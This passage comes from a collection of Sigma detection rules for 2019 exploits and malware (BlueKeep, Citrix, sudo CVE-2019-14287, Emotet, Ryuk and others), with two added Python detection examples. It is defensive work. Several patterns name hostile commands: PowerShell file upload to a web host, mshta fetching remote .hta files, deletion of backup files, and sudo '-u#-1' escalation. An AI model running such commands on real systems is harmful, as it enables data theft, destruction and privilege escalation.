    "content": "title: Potential BearLPE Exploitation\nid: 931b6802-d6a6-4267-9ffa-526f57f22aaf\nstatus: test\ndescription: Detects potential exploitation of the BearLPE local privilege escalation, which abuses a Task Scheduler \".job\" file import to obtain an arbitrary DACL write\nreferences:\n    - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp\nauthor: Olaf Hartong\ndate: 2019-05-22\nmodified: 2023-01-26\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - car.2013-08-001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/change'\n            - '/TN'\n            - '/RU'\n            - '/RP'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-0708/win_security_exploit_cve_2019_0708_scanner_poc.yml",
    "content": "title: Scanner PoC for CVE-2019-0708 RDP RCE Vuln\nid: 8400629e-79a9-4737-b387-5db940ab2367\nstatus: test\ndescription: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to  CVE-2019-0708 RDP RCE aka BlueKeep\nreferences:\n    - https://twitter.com/AdamTheAnalyst/status/1134394070045003776\n    - https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708\nauthor: Florian Roth (Nextron Systems), Adam Bradbury (idea)\ndate: 2019-06-02\nmodified: 2022-12-25\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - car.2013-07-002\n    - detection.emerging-threats\n    - cve.2019-0708\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4625\n        TargetUserName: AAAAAAA\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-0708/win_system_exploit_cve_2019_0708.yml",
    "content": "title: Potential RDP Exploit CVE-2019-0708\nid: aaa5b30d-f418-420b-83a0-299cb6024885\nstatus: test\ndescription: Detects suspicious errors from the RDP protocol driver (TermDD) that may indicate exploitation attempts of CVE-2019-0708\nreferences:\n    - https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708\n    - https://github.com/Ekultek/BlueKeep\nauthor: 'Lionel PRAT, Christophe BROCAS, @atc_project (improvements)'\ndate: 2019-05-24\nmodified: 2022-12-25\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - car.2013-07-002\n    - cve.2019-0708\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID:\n            - 56\n            - 50\n        Provider_Name: TermDD\n    condition: selection\nfalsepositives:\n    - Bad connections or network interruptions\n# too many false positives\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-11510/web_cve_2019_11510_pulsesecure_exploit.yml",
    "content": "title: Pulse Secure Attack CVE-2019-11510\nid: 2dbc10d7-a797-49a8-8776-49efa6442e60\nstatus: test\ndescription: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole\nreferences:\n    - https://www.exploit-db.com/exploits/47297\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-11-18\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2019-11510\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query: '*?/dana/html5acc/guacamole/*'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml",
    "content": "title: Exploiting SetupComplete.cmd CVE-2019-1378\nid: 1c373b6d-76ce-4553-997d-8c1da9a6b5f5\nstatus: test\ndescription: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378\nreferences:\n    - https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-11-15\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1574\n    - cve.2019-1378\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentCommandLine|contains|all:\n            - '\\cmd.exe'\n            - '/c'\n            - 'C:\\Windows\\Setup\\Scripts\\'\n        ParentCommandLine|endswith:\n            - 'SetupComplete.cmd'\n            - 'PartnerSetupComplete.cmd'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\Setup\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml",
    "content": "title: Exploiting CVE-2019-1388\nid: 02e0b2ea-a597-428e-b04a-af6a1a403e5c\nstatus: stable\ndescription: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM\nreferences:\n    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388\n    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-11-20\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2019-1388\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\consent.exe'\n        Image|endswith: '\\iexplore.exe'\n        CommandLine|contains: ' http'\n    selection_rights:\n        - IntegrityLevel:\n              - 'System'  # for Sysmon users\n              - 'S-1-16-16384' # System\n        - User|contains: # covers many language settings\n              - 'AUTHORI'\n              - 'AUTORI'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-14287/lnx_sudo_exploit_cve_2019_14287.yml",
    "content": "title: Sudo Privilege Escalation CVE-2019-14287 - Builtin\nid: 7fcc54cb-f27d-4684-84b7-436af096f858\nrelated:\n    - id: f74107df-b6c6-4e80-bf00-4170b658162b\n      type: derived\nstatus: test\ndescription: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287\nreferences:\n    - https://www.openwall.com/lists/oss-security/2019/10/14/1\n    - https://access.redhat.com/security/cve/cve-2019-14287\n    - https://twitter.com/matthieugarin/status/1183970598210412546\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-15\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.t1548.003\n    - cve.2019-14287\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    service: sudo\ndetection:\n    selection_user:\n        USER:\n            - '#-*'\n            - '#*4294967295'\n    condition: selection_user\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-14287/proc_creation_lnx_exploit_cve_2019_14287.yml",
    "content": "title: Sudo Privilege Escalation CVE-2019-14287\nid: f74107df-b6c6-4e80-bf00-4170b658162b\nstatus: test\ndescription: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287\nreferences:\n    - https://www.openwall.com/lists/oss-security/2019/10/14/1\n    - https://access.redhat.com/security/cve/cve-2019-14287\n    - https://twitter.com/matthieugarin/status/1183970598210412546\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-15\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.t1548.003\n    - cve.2019-14287\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains: ' -u#'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
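The two CVE-2019-14287 rules above look at the same attack from two log sources. sudo before 1.8.28 accepted a numeric target of `-u#-1`; the value -1 stored in an unsigned 32-bit uid_t is 4294967295, and both spellings were then treated as uid 0, which is why the builtin rule lists `#-*` and `#*4294967295`. The process-creation rule simply looks for ` -u#` in the command line, which also matches legitimate numeric `-u#<uid>` syntax, so it is broader than the log-based check. The Python below is an added example, not code from the Sigma project: it parses constructed sudo syslog lines (invented hosts, users and commands), applies the builtin rule's USER patterns, and mirrors the command-line check.

```python
import re

# Constructed sudo syslog lines, not real telemetry.
SUDO_LOG = """\
Oct 15 10:01:12 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/id
Oct 15 10:02:45 host sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=#-1 ; COMMAND=/bin/bash
Oct 15 10:03:02 host sudo:    carol : TTY=pts/2 ; PWD=/tmp ; USER=#4294967295 ; COMMAND=/bin/sh
Oct 15 10:04:30 host sudo:     dave : TTY=pts/3 ; PWD=/home/dave ; USER=#1001 ; COMMAND=/usr/bin/ls
"""

# invoking user, then " ; "-separated KEY=VALUE fields as sudo writes them
SUDO_LINE = re.compile(r"sudo:\s+(?P<invoker>\S+) : (?P<fields>.*)$")


def parse_sudo_line(line):
    """Return the sudo fields of one syslog line as a dict, or None if it is not a sudo record."""
    m = SUDO_LINE.search(line)
    if not m:
        return None
    fields = dict(kv.strip().split("=", 1) for kv in m.group("fields").split(" ; "))
    fields["invoker"] = m.group("invoker")
    return fields


def wrapped_uid(uid):
    """A negative uid cast to an unsigned 32-bit uid_t: -1 becomes 4294967295."""
    return uid & 0xFFFFFFFF


def is_cve_2019_14287_attempt(user_field):
    """Mirror the builtin rule's USER patterns '#-*' and '#*4294967295'."""
    return user_field.startswith("#-") or (
        user_field.startswith("#") and user_field.endswith(str(wrapped_uid(-1)))
    )


def suspicious_sudo_events(log_text):
    """Return (invoker, USER, COMMAND) for every line the builtin rule would flag."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_sudo_line(line)
        if ev and is_cve_2019_14287_attempt(ev.get("USER", "")):
            hits.append((ev["invoker"], ev["USER"], ev["COMMAND"]))
    return hits


def suspicious_cmdline(command_line):
    """Mirror the process_creation rule: CommandLine contains ' -u#'."""
    return " -u#" in command_line


if __name__ == "__main__":
    for hit in suspicious_sudo_events(SUDO_LOG):
        print("CVE-2019-14287 attempt:", hit)
```

The `dave` line uses the legal `#1001` numeric form and is not flagged by the log-based check, while the same command would trip the broader process-creation rule; that difference is the reason the two rules carry different levels.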
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-19781/web_cve_2019_19781_citrix_exploit.yml",
    "content": "title: Citrix Netscaler Attack CVE-2019-19781\nid: ac5a6409-8c89-44c2-8d64-668c29a2d756\nstatus: test\ndescription: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack\nreferences:\n    - https://support.citrix.com/article/CTX267679\n    - https://support.citrix.com/article/CTX267027\n    - https://isc.sans.edu/diary/25686\n    - https://twitter.com/mpgn_x64/status/1216787131210829826\n    - https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md\nauthor: Arnim Rupp, Florian Roth\ndate: 2020-01-02\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2019-19781\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Make sure that your Netscaler appliance logs all kinds of attacks (test with http://your-citrix-gw.net/robots.txt). The directory traversal with ../ might not be needed on certain cloud instances or for authenticated users, so we also check for direct paths. All scripts in portal/scripts are exploitable except logout.pl.'\ndetection:\n    selection_cs:\n        - cs-uri-query|contains: '/../vpns/'\n        - cs-uri-query|endswith: '/vpns/cfg/smb.conf'\n    selection_csall:\n        cs-uri-query|contains|all:\n            - '/vpns/portal/scripts/'\n            - '.pl'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-3398/web_cve_2019_3398_confluence.yml",
    "content": "title: Confluence Exploitation CVE-2019-3398\nid: e9bc39ae-978a-4e49-91ab-5bd481fc668b\nstatus: test\ndescription: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398\nreferences:\n    - https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-26\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2019-3398\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/upload.action'\n            - 'filename=../../../../'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml",
    "content": "title: Potential Baby Shark Malware Activity\nid: 2b30fa36-3a18-402f-a22d-bf4ce2189f35\nstatus: test\ndescription: Detects activity that could be related to Baby Shark malware\nreferences:\n    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-24\nmodified: 2023-03-08\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.t1012\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.t1218.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - 'powershell.exe mshta.exe http'\n              - '.hta'\n        - CommandLine|contains:\n              - 'reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"'\n              - 'cmd.exe /c taskkill /im cmd.exe'\n              - \"(New-Object System.Net.WebClient).UploadFile('http\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Chafer/proxy_malware_chafer_url_pattern.yml",
    "content": "title: Chafer Malware URL Pattern\nid: fb502828-2db0-438e-93e6-801c7548686d\nstatus: test\ndescription: Detects HTTP request used by Chafer malware to receive data from its C2.\nreferences:\n    - https://securelist.com/chafer-used-remexi-malware/89538/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-31\nmodified: 2024-02-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/asp.asp\\?ui='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml",
    "content": "title: Potential Dridex Activity\nid: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e\nstatus: stable\ndescription: Detects potential Dridex activity via specific process patterns\nreferences:\n    - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3\n    - https://redcanary.com/threat-detection-report/threats/dridex/\nauthor: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-10\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.discovery\n    - attack.t1135\n    - attack.t1033\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_svchost:\n        Image|endswith: '\\svchost.exe'\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\Desktop\\'\n    filter_svchost:\n        ParentImage|startswith: 'C:\\Windows\\System32\\'\n    selection_regsvr:\n        ParentImage|endswith: '\\excel.exe'\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains:\n            - ' -s '\n            - '\\AppData\\Local\\Temp\\'\n    filter_regsvr:\n        CommandLine|contains: '.dll'\n    selection_anomaly_parent:\n        ParentImage|endswith: '\\svchost.exe'\n    selection_anomaly_child_1:\n        Image|endswith: '\\whoami.exe'\n        CommandLine|contains: ' /all'\n    selection_anomaly_child_2:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: ' view'\n    condition: (selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml",
    "content": "title: Potential Dtrack RAT Activity\nid: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4\nstatus: stable\ndescription: Detects potential Dtrack RAT activity via specific process patterns\nreferences:\n    - https://securelist.com/my-name-is-dtrack/93338/\n    - https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\n    - https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\n    - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/\n    - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-30\nmodified: 2025-11-03\ntags:\n    - attack.impact\n    - attack.t1490\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ping:\n        CommandLine|re: 'ping\\s+-n.{6,64}echo EEEE\\s?>\\s?'\n    selection_ipconfig:\n        CommandLine|re: 'ipconfig\\s+/all'\n        CommandLine|contains: '\\temp\\res.ip'\n    selection_netsh:\n        CommandLine|contains|all:\n            - 'interface ip show config'\n            - '\\temp\\netsh.res'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml",
    "content": "title: Potential Emotet Activity\nid: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18\nstatus: stable\ndescription: Detects all Emotet-like process executions that are not covered by the more generic rules\nreferences:\n    - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/\n    - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/\n    - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/\n    - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-09-30\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -e* PAA'\n            - 'JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ' # $env:userprofile\n            - 'QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA' # $env:userprofile\n            - 'kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA' # $env:userprofile\n            - 'IgAoACcAKgAnACkAOwAkA' # \"('*');$\n            - 'IAKAAnACoAJwApADsAJA' # \"('*');$\n            - 'iACgAJwAqACcAKQA7ACQA' # \"('*');$\n            - 'JABGAGwAeAByAGgAYwBmAGQ'\n            - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA' # =$env:temp+(\n            - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA' # =$env:temp+(\n            - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA' # =$env:temp+(\n    filter:\n        CommandLine|contains:\n            - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ'\n            - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA'\n            - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
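The Emotet rule above carries each PowerShell fragment three times (for example the three strings commented `$env:userprofile`). That is because `powershell -EncodedCommand` takes base64 over the UTF-16LE script, and base64 emits 4 characters per 3 bytes, so the same text encodes to one of three different strings depending on where it falls relative to a 3-byte boundary; the characters at each end that also depend on the neighbouring bytes have to be cut off. The following Python is an added example, not code from the Sigma project or the rule's author, that derives those alignment variants for any string and checks which one occurs in a given encoded blob. The sample scripts are constructed for the example.

```python
import base64


def utf16le_b64_offsets(text: str) -> list:
    """Return the three base64 renderings of text (as UTF-16LE) for the three possible byte
    alignments, with the characters that also depend on neighbouring bytes removed.
    An -EncodedCommand blob that contains text contains at least one of them as a substring."""
    raw = text.encode("utf-16-le")
    variants = []
    for pad in range(3):
        # Shift the alignment by prefixing 0, 1 or 2 dummy bytes.
        enc = base64.b64encode(b"\x00" * pad + raw).decode("ascii")
        head = (0, 2, 3)[pad]                    # leading chars mixed with the dummy bytes
        tail = (0, 3, 2)[(pad + len(raw)) % 3]   # trailing chars mixed with what follows, plus '=' padding
        variants.append(enc[head:len(enc) - tail])
    return variants


def encoded_command(script: str) -> str:
    """What powershell.exe -EncodedCommand expects: base64 over the UTF-16LE encoded script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def matching_offset(encoded: str, text: str):
    """Index (0, 1 or 2) of the alignment variant of text found in the blob, or None."""
    for i, variant in enumerate(utf16le_b64_offsets(text)):
        if variant in encoded:
            return i
    return None


if __name__ == "__main__":
    for v in utf16le_b64_offsets("$env:userprofile"):
        print(v)  # the three $env:userprofile strings from the rule above
    # Constructed scripts: the fragment starts at byte offset 6 (alignment 0) and 8 (alignment 2).
    print(matching_offset(encoded_command("$x=$env:userprofile;"), "$env:userprofile"))   # 0
    print(matching_offset(encoded_command("$ab=$env:userprofile"), "$env:userprofile"))   # 2
```

Run this with the other commented fragments (`=$env:temp+(` and `"('*');$`) and the output reproduces the remaining nine strings in the rule, which is a quick way to confirm that a new set of encoded-command indicators has all three alignments covered and no stray boundary characters.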
  {
    "path": "rules-emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml",
    "content": "title: Formbook Process Creation\nid: 032f5fb3-d959-41a5-9263-4173c802dc2b\nstatus: test\ndescription: Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which then execute a specific command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent processes with command line parameters.\nreferences:\n    - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer\n    - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/\n    - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/\n    - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-09-30\nmodified: 2022-10-06\ntags:\n    - attack.resource-development\n    - attack.t1587.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        # Parent command line should not contain a space value\n        # This avoids false positives not caused by process injection\n        # e.g. wscript.exe /B sysmon-install.vbs\n        ParentCommandLine|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n        ParentCommandLine|endswith: '.exe'\n    selection2:\n        - CommandLine|contains|all:\n              - '/c'\n              - 'del'\n              - 'C:\\Users\\'\n              - '\\AppData\\Local\\Temp\\'\n        - CommandLine|contains|all:\n              - '/c'\n              - 'del'\n              - 'C:\\Users\\'\n              - '\\Desktop\\'\n        - CommandLine|contains|all:\n              - '/C'\n              - 'type nul >'\n              - 'C:\\Users\\'\n              - '\\Desktop\\'\n    selection3:\n        CommandLine|endswith: '.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml",
    "content": "title: LockerGoga Ransomware Activity\nid: 74db3488-fd28-480a-95aa-b7af626de068\nstatus: stable\ndescription: Detects LockerGoga ransomware activity via specific command line.\nreferences:\n    - https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a\n    - https://blog.f-secure.com/analysis-of-lockergoga-ransomware/\n    - https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/\nauthor: Vasiliy Burov, oscd.community\ndate: 2020-10-18\nmodified: 2023-02-03\ntags:\n    - attack.impact\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '-i SM-tgytutrc -s'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml",
    "content": "title: Potential QBot Activity\nid: 4fcac6eb-0287-4090-8eea-2602e4c20040\nstatus: stable\ndescription: Detects potential QBot activity by looking for process executions used previously by QBot\nreferences:\n    - https://twitter.com/killamjr/status/1179034907932315648\n    - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-01\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        ParentImage|endswith: '\\WinRAR.exe'\n        Image|endswith: '\\wscript.exe'\n    selection2:\n        CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '\n    selection3:\n        CommandLine|contains|all:\n            - 'regsvr32.exe'\n            - 'C:\\ProgramData'\n            - '.tmp'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml",
    "content": "title: Potential Ryuk Ransomware Activity\nid: c37510b8-2107-4b78-aa32-72f251e7a844\nrelated:\n    - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27\n      type: similar\n    - id: 0acaad27-9f02-4136-a243-c357202edd74\n      type: obsolete\nstatus: stable\ndescription: Detects Ryuk ransomware activity\nreferences:\n    - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\n    - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/\nauthor: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-12-16\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        CommandLine|contains|all:\n            - 'Microsoft\\Windows\\CurrentVersion\\Run'\n            - 'C:\\users\\Public\\'\n    selection_del:\n        CommandLine|contains|all:\n            - 'del /s /f /q c:\\'\n            - '\\*.bac'\n            - '\\*.bak'\n            - '\\*.bkf'\n    selection_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains|all:\n            - ' stop '\n            - ' /y'\n        CommandLine|contains:\n            - 'samss'\n            - 'audioendpointbuilder'\n            - 'unistoresvc_'\n            - 'AcrSch2Svc'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml",
    "content": "title: Potential Snatch Ransomware Activity\nid: 5325945e-f1f0-406e-97b8-65104d393fff\nstatus: stable\ndescription: Detects specific process characteristics of Snatch ransomware word document droppers\nreferences:\n    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-08-26\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - attack.t1204\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|re: 'shutdown\\s+/r /f /t 00' # Shutdown in safe mode immediately\n        - CommandLine|re: 'net\\s+stop SuperBackupMan'\n    condition: selection\nfalsepositives:\n    - Scripts that shut down the system immediately and reboot it into safe mode are unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ursnif/proxy_malware_ursnif_c2_url.yml",
